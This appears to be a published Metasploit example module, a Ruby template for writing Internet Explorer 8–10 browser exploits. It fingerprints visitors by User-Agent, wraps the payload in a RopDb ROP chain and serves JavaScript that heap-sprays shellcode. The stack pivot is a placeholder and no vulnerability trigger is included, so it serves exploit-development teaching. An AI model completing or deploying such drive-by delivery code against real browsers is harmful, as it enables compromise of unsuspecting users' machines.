Windows Browser Example Exploit

This template covers IE8/9/10 and uses the User-Agent HTTP header to detect the browser version. Note that IE8 and newer may emulate an older IE version in compatibility mode; in that case the module will not be able to detect the browser correctly. This is an example Metasploit module intended for exploit development.


MD5 | faa8b809be83a6b1aea60f69ecb52ffc

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample demonstrates how a typical browser exploit is written using commonly
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
#
###
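class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  # "Windows NT x.y" token of an IE user-agent -> OS name exactly as it is
  # written in the target table below. Any NT version missing here (for
  # example "5.2") makes get_target return nil instead of raising.
  NT_VERSION_TO_OS = {
    '5.1' => 'Windows XP SP3',
    '6.0' => 'Windows Vista',
    '6.1' => 'Windows 7',
    '6.2' => 'Windows 8',
    '6.3' => 'Windows 8.1'
  }.freeze

  # Set :classid and :method for ActiveX exploits. For example:
  # :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
  # :method => "SetShapeNodeType",
  autopwn_info({
    :ua_name => HttpClients::IE,
    :ua_minver => "8.0",
    :ua_maxver => "10.0",
    :javascript => true,
    :os_name => OperatingSystems::Match::WINDOWS,
    :rank => NormalRanking
  })

  # Module metadata: name, description, targets and payload constraints.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Module Name",
      'Description' => %q{
        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
        the browser version. Please note IE8 and newer may emulate an older IE version
        in compatibility mode, in that case the module won't be able to detect the
        browser correctly.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'sinn3r' ],
      'References' =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform' => 'win',
      # Target names are matched by substring in get_target, so the
      # "IE <n> on <os>" wording must agree with NT_VERSION_TO_OS.
      'Targets' =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
          [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
          [ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
          [ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
          [ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
        ],
      'Payload' =>
        {
          'BadChars' => "\x00", # js_property_spray
          'StackAdjustment' => -3500
        },
      'Privileged' => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget' => 0))
  end

  # Resolves the target row for a request, using only the User-Agent header.
  #
  # A target chosen explicitly in the module options is returned unchanged.
  # For the 'Automatic' target the IE major version ("MSIE n") and the
  # Windows NT version ("Windows NT x.y") are extracted from the agent string
  # and matched against the names in the target table. IE in compatibility
  # mode reports an older MSIE token, so it cannot be told apart here.
  #
  # @param agent [String, nil] User-Agent header value; nil when the header is absent
  # @return [Msf::Module::Target, nil] the matching target, or nil when no row fits
  def get_target(agent)
    return target if target.name != 'Automatic'

    # A request without a User-Agent header must not crash the handler.
    ua = agent.to_s
    nt = ua.scan(/Windows NT (\d\.\d)/).flatten.first || ''
    # \d+ so that "MSIE 10.0" yields "10"; a single-digit capture gave "1",
    # which only matched the "IE 10" row by substring coincidence.
    ie = ua.scan(/MSIE (\d+)/).flatten.first || ''
    return nil if nt.empty? || ie.empty?

    os_name = NT_VERSION_TO_OS[nt]
    # Unlisted NT versions previously reached String#include? with nil (TypeError).
    return nil if os_name.nil?

    ie_name = "IE #{ie}"
    targets.find { |t| t.name.include?(ie_name) && t.name.include?(os_name) }
  end

  # Builds the ROP-wrapped payload for the chosen target.
  #
  # The stack pivot is a placeholder ("ABCD") in this template; a real module
  # supplies the pivot gadget for its target. The 'Rop' target option selects
  # the RopDb entry: :msvcrt uses the msvcrt chain with the 'xp' variant,
  # anything else falls back to the JRE chain.
  #
  # @param t [Msf::Module::Target] the target being served
  # @return [String] ROP chain followed by the encoded payload
  def get_payload(t)
    stack_pivot = "\x41\x42\x43\x44"
    code = payload.encoded

    if t['Rop'] == :msvcrt
      print_status("Using msvcrt ROP")
      generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
    else
      print_status("Using JRE ROP")
      generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    end
  end

  # Renders the HTML document served to the browser: the property-spray
  # helper script followed by the payload as an unescape()'d JavaScript
  # string handed to sprayHeap.
  #
  # @param t [Msf::Module::Target] the target being served
  # @return [String] HTML page with the leading two-tab indentation stripped
  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    html = %Q|
		<script>
		#{js_property_spray}

		var s = unescape("#{js_p}");
		sprayHeap({shellcode:s});
		</script>
		|

    # The literal above is indented with two tabs for readability only.
    html.gsub(/^\t\t/, '')
  end

  # HTTP request handler: picks a target from the User-Agent and serves the
  # page, or answers 404 when the browser/OS combination is not in the table.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected client
  # @param request [Rex::Proto::Http::Request] the incoming request
  # @return [void]
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")

    tgt = get_target(agent)
    if tgt.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected as: #{tgt.name}")
    html = get_html(tgt)
    # no-cache so a retried request is re-evaluated against the current target.
    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
  end
end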
